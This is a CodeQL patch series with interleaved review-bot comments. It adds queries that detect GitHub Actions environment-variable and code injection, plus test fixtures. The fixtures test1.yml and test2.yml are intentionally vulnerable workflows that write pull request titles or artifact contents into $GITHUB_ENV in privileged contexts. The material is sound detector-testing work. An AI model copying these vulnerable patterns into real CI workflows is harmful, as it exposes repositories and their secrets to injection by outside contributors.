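Review bot: `isSingleTriggerWorkflow` is defined verbatim in both this query and ql/src/Security/CWE-094/PrivilegedCodeInjection.ql (the next hunk); move it to a shared library module so the two privileged-injection queries cannot drift, which they already did before this patch (patch 134 added a `"*"` trigger case only to the code-injection query, and that hunk's `index 69ab240616e6..62030e322633` shows it was produced against the same pre-134 blob, so applying the series in order is likely to conflict on that `where` clause). The aggregate can be written `count(w.getATriggerEvent()) = 1`, and the predicate needs QLDoc, e.g. `/** Holds if `trigger` is the only event that triggers `w`. */`. The new filter keeps workflows with no trigger at all and workflows whose triggers are `pull_request` plus anything else, which appears to be the intended privileged set, but a one-line comment at `not isSingleTriggerWorkflow(w, "pull_request")` saying so would save the next reader from re-deriving it.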
diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected
index 5395fe824535..a8a0414dd9f9 100644
--- a/ql/test/library-tests/test.expected
+++ b/ql/test/library-tests/test.expected
@@ -313,48 +313,46 @@ scopes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/test.yml:1:1:40:53 | on: push | sources -| ahmadnassri/action-changed-files | * | output.files | pull_request_target | PR changed files | -| ahmadnassri/action-changed-files | * | output.json | pull_request_target | PR changed files | -| amannn/action-semantic-pull-request | * | output.error_message | pull_request_target | PR title | -| cypress-io/github-action | * | env.GH_BRANCH | pull_request_target | PR branch | -| dawidd6/action-download-artifact | * | output.artifacts | * | Artifact details | -| dorny/paths-filter | * | output.changes | pull_request_target | PR changed files | -| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | pull_request_target | PR body | -| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | pull_request_target | PR title | -| jitterbit/get-changed-files | * | output.added | pull_request_target | PR changed files | -| jitterbit/get-changed-files | * | output.added_modified | pull_request_target | PR changed files | -| jitterbit/get-changed-files | * | output.all | pull_request_target | PR changed files | -| jitterbit/get-changed-files | * | output.deleted | pull_request_target | PR changed files | -| jitterbit/get-changed-files | * | output.modified | pull_request_target | PR changed files | -| jitterbit/get-changed-files | * | output.removed | pull_request_target | PR changed files | -| jitterbit/get-changed-files | * | output.renamed | pull_request_target | PR changed files | -| khan/pull-request-comment-trigger | * | output.comment_body | issue_comment | | -| khan/pull-request-comment-trigger | * | output.comment_body | pull_request_comment | | -| octo-org/source-repo/.github/workflows/workflow.yml | * | output.workflow-output | * | Foo | -| tj-actions/branch-names | * | output.current_branch | pull_request_target | PR current branch | -| tj-actions/branch-names | * | 
output.head_ref_branch | pull_request_target | PR head branch | -| tj-actions/branch-names | * | output.ref_branch | pull_request_target | Branch tirggering workflow run | -| tj-actions/changed-files | * | output.added_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.all_changed_and_modified_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.all_changed_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.all_modified_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.all_old_new_renamed_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.changed_keys | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.copied_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.deleted_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.modified_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.modified_keys | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.other_changed_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.other_deleted_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.other_modified_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.renamed_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.type_changed_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.unknown_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.unmerged_files | pull_request_target | PR changed files | -| tj-actions/verify-changed-files | * | output.changed-files | pull_request_target | PR changed 
files | -| tzkhan/pr-update-action | * | output.headMatch | pull_request_target | | -| xt0rted/slash-command-action | * | output.command-arguments | issue_comment | | -| xt0rted/slash-command-action | * | output.command-arguments | pull_request_comment | | +| ahmadnassri/action-changed-files | * | output.files | PR changed files | +| ahmadnassri/action-changed-files | * | output.json | PR changed files | +| amannn/action-semantic-pull-request | * | output.error_message | PR title | +| cypress-io/github-action | * | env.GH_BRANCH | PR branch | +| dawidd6/action-download-artifact | * | output.artifacts | Artifact details | +| dorny/paths-filter | * | output.changes | PR changed files | +| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | PR body | +| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | PR title | +| jitterbit/get-changed-files | * | output.added | PR changed files | +| jitterbit/get-changed-files | * | output.added_modified | PR changed files | +| jitterbit/get-changed-files | * | output.all | PR changed files | +| jitterbit/get-changed-files | * | output.deleted | PR changed files | +| jitterbit/get-changed-files | * | output.modified | PR changed files | +| jitterbit/get-changed-files | * | output.removed | PR changed files | +| jitterbit/get-changed-files | * | output.renamed | PR changed files | +| khan/pull-request-comment-trigger | * | output.comment_body | Comment body | +| octo-org/source-repo/.github/workflows/workflow.yml | * | output.workflow-output | Foo | +| tj-actions/branch-names | * | output.current_branch | PR current branch | +| tj-actions/branch-names | * | output.head_ref_branch | PR head branch | +| tj-actions/branch-names | * | output.ref_branch | Branch tirggering workflow run | +| tj-actions/changed-files | * | output.added_files | PR changed files | +| tj-actions/changed-files | * | output.all_changed_and_modified_files | PR changed files | +| tj-actions/changed-files | * | 
output.all_changed_files | PR changed files | +| tj-actions/changed-files | * | output.all_modified_files | PR changed files | +| tj-actions/changed-files | * | output.all_old_new_renamed_files | PR changed files | +| tj-actions/changed-files | * | output.changed_keys | PR changed files | +| tj-actions/changed-files | * | output.copied_files | PR changed files | +| tj-actions/changed-files | * | output.deleted_files | PR changed files | +| tj-actions/changed-files | * | output.modified_files | PR changed files | +| tj-actions/changed-files | * | output.modified_keys | PR changed files | +| tj-actions/changed-files | * | output.other_changed_files | PR changed files | +| tj-actions/changed-files | * | output.other_deleted_files | PR changed files | +| tj-actions/changed-files | * | output.other_modified_files | PR changed files | +| tj-actions/changed-files | * | output.renamed_files | PR changed files | +| tj-actions/changed-files | * | output.type_changed_files | PR changed files | +| tj-actions/changed-files | * | output.unknown_files | PR changed files | +| tj-actions/changed-files | * | output.unmerged_files | PR changed files | +| tj-actions/verify-changed-files | * | output.changed-files | PR changed files | +| tzkhan/pr-update-action | * | output.headMatch | | +| xt0rted/slash-command-action | * | output.command-arguments | | summaries | akhileshns/heroku-deploy | * | input.branch | output.status | taint | | android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index 268396a711e3..d56ec73e26ff 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql 
@@ -49,8 +49,8 @@ query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = query predicate scopes(Cfg::CfgScope c) { any() } -query predicate sources(string action, string version, string output, string trigger, string kind) { - sourceModel(action, version, output, trigger, kind) +query predicate sources(string action, string version, string output, string kind) { + sourceModel(action, version, output, kind) } query predicate summaries(string action, string version, string input, string output, string kind) { diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml index 215b32528853..995fefe4a15e 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml @@ -4,8 +4,8 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.issue.title }}' # not defined - - run: echo '${{ github.event.issue.body }}' # not defined + - run: echo '${{ github.event.issue.title }}' # not defined for this trigger, but we will still report it + - run: echo '${{ github.event.issue.body }}' # not defined for this trigger, but we will still report it - run: echo '${{ github.event.pull_request.title }}' - run: echo '${{ github.event.pull_request.body }}' - run: echo '${{ github.event.pull_request.head.label }}' diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index e818ced0c1d7..7061f509b812 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected 
@@ -230,6 +230,10 @@ subpaths | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | +| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | 
@@ -253,6 +257,8 @@ subpaths | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | ${{ github.event.issue.body }} | | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | 
@@ -271,6 +277,8 @@ subpaths | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | From 822e9bcaab1357c734654d200790bab4b2175bc8 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 23 Mar 2024 21:55:49 +0100 Subject: [PATCH 137/707] env var injection query --- .../actions/security/EnvVarInjectionQuery.qll | 36 +++++++++ ql/src/Security/CWE-077/EnvVarInjection.ql | 23 ++++++ .../CWE-077/PrivilegedEnvVarInjection.ql | 26 +++++++ .../CWE-077/.github/workflows/test1.yml | 25 +++++++ .../CWE-077/.github/workflows/test2.yml | 73 +++++++++++++++++++ .../CWE-077/.github/workflows/test3.yml | 64 ++++++++++++++++ .../Security/CWE-077/EnvVarInjection.qlref | 1 + .../CWE-077/PrivilegedEnvVarInjection.qlref | 1 + .../CWE-094/.github/workflows/inter-job0.yml | 4 +- 9 files changed, 251 insertions(+), 2 deletions(-) create mode 100644 ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll create mode 100644 ql/src/Security/CWE-077/EnvVarInjection.ql create mode 100644 ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml create mode 100644 ql/test/query-tests/Security/CWE-077/EnvVarInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.qlref diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll new file mode 100644 index 000000000000..dbae3f48f800 --- /dev/null +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll 
@@ -0,0 +1,36 @@
+private import actions
+private import codeql.actions.TaintTracking
+private import codeql.actions.dataflow.ExternalFlow
+import codeql.actions.dataflow.FlowSources
+import codeql.actions.DataFlow
+
+predicate writeToGithubEnvSink(DataFlow::Node sink) {
+ exists(Expression expr, Run run, string script, string line, string value |
+ script = run.getScript() and
+ line = script.splitAt("\n") and
+ value = line.regexpCapture("echo\\s+.*\\s*=(.*)>>\\s*\\$GITHUB_ENV", 1) and
+ expr = sink.asExpr() and
+ run.getAnScriptExpr() = expr and
+ value.indexOf(expr.getRawExpression()) > 0
+ )
+}
+
+private class EnvVarInjectionSink extends DataFlow::Node {
+ EnvVarInjectionSink() {
+ writeToGithubEnvSink(this) or
+ externallyDefinedSink(this, "envvar-injection")
+ }
+}
+
+/**
+ * A taint-tracking configuration for unsafe user input
+ * that is used to construct and evaluate an environment variable.
+ */
+private module EnvVarInjectionConfig implements DataFlow::ConfigSig {
+ predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
+
+ predicate isSink(DataFlow::Node sink) { sink instanceof EnvVarInjectionSink }
+}
+
+/** Tracks flow of unsafe user input that is used to construct and evaluate an environment variable. */
+module EnvVarInjectionFlow = TaintTracking::Global;
diff --git a/ql/src/Security/CWE-077/EnvVarInjection.ql b/ql/src/Security/CWE-077/EnvVarInjection.ql
new file mode 100644
index 000000000000..2e978ad9e53f
--- /dev/null
+++ b/ql/src/Security/CWE-077/EnvVarInjection.ql
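Review bot: `value.indexOf(expr.getRawExpression()) > 0` misses the most direct form of the sink: for `echo "KEY=${{ github.event.pull_request.title }}" >> $GITHUB_ENV` the captured value begins with the expression, `indexOf` yields 0, and the step is not a sink; it should be `value.indexOf(expr.getRawExpression()) >= 0`. The sink is also narrower than the predicate name suggests: `regexpCapture` must match the whole line, so an indented `echo` inside an `if`/loop body or any trailing text after `$GITHUB_ENV` fails, and `>> "$GITHUB_ENV"`, `>> ${GITHUB_ENV}`, `printf`, `tee -a` and heredocs write the same file without matching. Those gaps should be stated in a QLDoc comment on `writeToGithubEnvSink`, e.g. `/** Holds if sink is an expression interpolated into the value of a single-line echo NAME=VALUE >> $GITHUB_ENV command; quoted or braced $GITHUB_ENV, printf, tee and heredoc writers are not modelled. */`, so nobody reads the predicate as complete. `TaintTracking::Global;` on the last line looks like the type argument was lost in rendering; worth confirming the committed file reads `TaintTracking::Global<EnvVarInjectionConfig>`.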
@@ -0,0 +1,23 @@
+/**
+ * @name Enviroment Variable built from user-controlled sources
+ * @description Building an environment variable from user-controlled sources may alter the execution of following system commands
+ * @kind path-problem
+ * @problem.severity warning
+ * @security-severity 5.0
+ * @precision high
+ * @id actions/envvar-injection
+ * @tags actions
+ * security
+ * external/cwe/cwe-077
+ * external/cwe/cwe-020
+ */
+
+import actions
+import codeql.actions.security.EnvVarInjectionQuery
+import EnvVarInjectionFlow::PathGraph
+
+from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink
+where EnvVarInjectionFlow::flowPath(source, sink)
+select sink.getNode(), source, sink,
+ "Potential environment variable injection in $@, which may be controlled by an external user.",
+ sink, sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql
new file mode 100644
index 000000000000..bce9494a43f2
--- /dev/null
+++ b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql
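Review bot: The `@name` misspells "Environment" (`Enviroment Variable built from user-controlled sources`), and since this string is what code scanning shows as the alert title it should be `@name Environment variable built from user-controlled sources`. The `@description` would also help triage if it named the actual sink instead of the generic "building an environment variable": `@description Writing user-controlled input to $GITHUB_ENV may alter the execution of the following steps of the job`. `@precision high` is a strong claim for a sink that is recognised by a single regular expression over `echo … >> $GITHUB_ENV` lines; consider `medium` until the `.expected` files show how the fixtures in this commit are classified.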
@@ -0,0 +1,26 @@
+/**
+ * @name Enviroment Variable built from user-controlled sources
+ * @description Building an environment variable from user-controlled sources may alter the execution of following system commands
+ * @kind path-problem
+ * @problem.severity error
+ * @security-severity 9
+ * @precision high
+ * @id actions/privileged-envvar-injection
+ * @tags actions
+ * security
+ * external/cwe/cwe-077
+ * external/cwe/cwe-020
+ */
+
+import actions
+import codeql.actions.security.EnvVarInjectionQuery
+import EnvVarInjectionFlow::PathGraph
+
+from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink, Workflow w
+where
+ EnvVarInjectionFlow::flowPath(source, sink) and
+ w = source.getNode().asExpr().getEnclosingWorkflow() and
+ w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent())
+select sink.getNode(), source, sink,
+ "Potential privileged environment variable injection in $@, which may be controlled by an external user.",
+ sink, sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml
new file mode 100644
index 000000000000..b2780d54c045
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml
@@ -0,0 +1,25 @@
+name: Pull Request Open
+
+on:
+ pull_request_target:
+ branches:
+ - main
+ - 14.0.x
+
+ types:
+ - opened
+ - reopened
+
+jobs:
+ updateJira:
+ if: github.actor != 'dependabot[bot]'
+ runs-on: ubuntu-latest
+ steps:
+ - name: Checkout repository
+ uses: actions/checkout@v4
+
+ - name: Extract Jira Key
+ run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV
+
+
+
diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml
new file mode 100644
index 000000000000..e71178c4ad66
--- /dev/null
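Review bot: The privileged filter here, `w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent())`, is exactly the form that PrivilegedCommandInjection.ql and PrivilegedCodeInjection.ql replaced earlier in this series with `not isSingleTriggerWorkflow(w, "pull_request")`, and the library test in the same series dropped the trigger column from `sourceModel`, so the three "privileged" queries no longer agree on what privileged means and modelled sources may no longer carry a trigger at all. The next patch in the series ("Only triggered on non-pull_request events") touches this file per its diffstat, which suggests the author noticed; whichever form wins should be a single shared predicate rather than a third copy. The `@name` also repeats the "Enviroment" typo from EnvVarInjection.ql and should read `@name Environment variable built from user-controlled sources`.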
+++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml 
@@ -0,0 +1,73 @@ +# https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability-0 +# https://github.com/firebase/friendlyeats-web/commit/df65aefd24cf6f092a27a5576067ff9f29aa2ef1 +name: Deploy Preview +on: + workflow_run: + workflows: ["Generate Preview"] + types: + - completed + +jobs: + deploy: + runs-on: ubuntu-latest + if: > + ${{ github.event.workflow_run.event == 'pull_request' && + github.event.workflow_run.conclusion == 'success' }} + steps: + - name: 'Download artifact' + uses: actions/github-script@v3.1.0 + with: + script: | + var artifacts = await github.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: ${{ github.event.workflow_run.id }}, + }); + var matchPrArtifact = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "pr" + })[0]; + var matchPreviewArtifact = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "preview" + })[0]; + var downloadPr = await github.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchPrArtifact.id, + archive_format: 'zip', + }); + var downloadPreview = await github.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchPreviewArtifact.id, + archive_format: 'zip', + }); + var fs = require('fs'); + fs.writeFileSync('${{github.workspace}}/pr.zip', Buffer.from(downloadPr.data)); + fs.writeFileSync('${{github.workspace}}/firestore-web.zip', Buffer.from(downloadPreview.data)); + - run: | + unzip pr.zip + echo "pr_number=$(cat NR)" >> $GITHUB_ENV + mkdir firestore-web + unzip firestore-web.zip -d firestore-web + - name: Deploy preview + id: deploy_preview + uses: FirebaseExtended/action-hosting-deploy@v0 + with: + repoToken: '${{ secrets.GITHUB_TOKEN }}' + firebaseServiceAccount: '${{ secrets.FIREBASE_SERVICE_ACCOUNT_FIR_CODELABS_89252 }}' + projectId: fir-codelabs-89252 + entryPoint: firestore-web + channelId: 
firestore-web-${{ env.pr_number }} + env: + FIREBASE_CLI_PREVIEWS: hostingchannels + - name: Write Comment + uses: actions/github-script@v3 + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + script: | + await github.issues.createComment({ + owner: context.repo.owner, + repo: context.repo.repo, + issue_number: ${{ env.pr_number }}, + body: 'View preview ${{ steps.deploy_preview.outputs.details_url }}' + }); diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml new file mode 100644 index 000000000000..2f76d4a3042a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml 
